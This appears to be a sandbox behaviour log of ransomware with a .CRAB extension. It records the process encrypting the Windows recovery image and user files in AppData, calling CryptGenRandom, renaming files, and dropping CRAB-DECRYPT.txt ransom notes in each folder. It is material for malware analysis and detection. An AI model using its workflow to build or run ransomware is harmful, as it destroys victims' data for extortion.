File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 818707 True 1
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 818720 True 1
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 256 True 2
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\IndexerVolumeGuid, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\IndexerVolumeGuid, destination_filename = C:\System Volume Information\IndexerVolumeGuid.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 1048576, size_out = 76 True 1
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 80 True 1
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\tracking.log, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\tracking.log, destination_filename = C:\System Volume Information\tracking.log.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\System Volume Information\tracking.log.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\tracking.log.CRAB, size = 1048576, size_out = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB, size = 1048576, size_out = 30661 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB, size = 30672 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0e --Sjj8.png.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB, size = 1048576, size_out = 14426 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB, size = 14432 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3-ups.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB, size = 1048576, size_out = 73148 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB, size = 73152 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\3RUX.wav.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB, size = 1048576, size_out = 45723 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB, size = 45728 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4YuuLKA.odp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB, size = 1048576, size_out = 29551 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB, size = 29552 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5yzpGS XhyEkxX.gif.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB, size = 1048576, size_out = 99042 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB, size = 99056 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\8g-qzF4N.wav.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 1048576, size_out = 22 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 32 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 1048576, size_out = 24 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 32 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
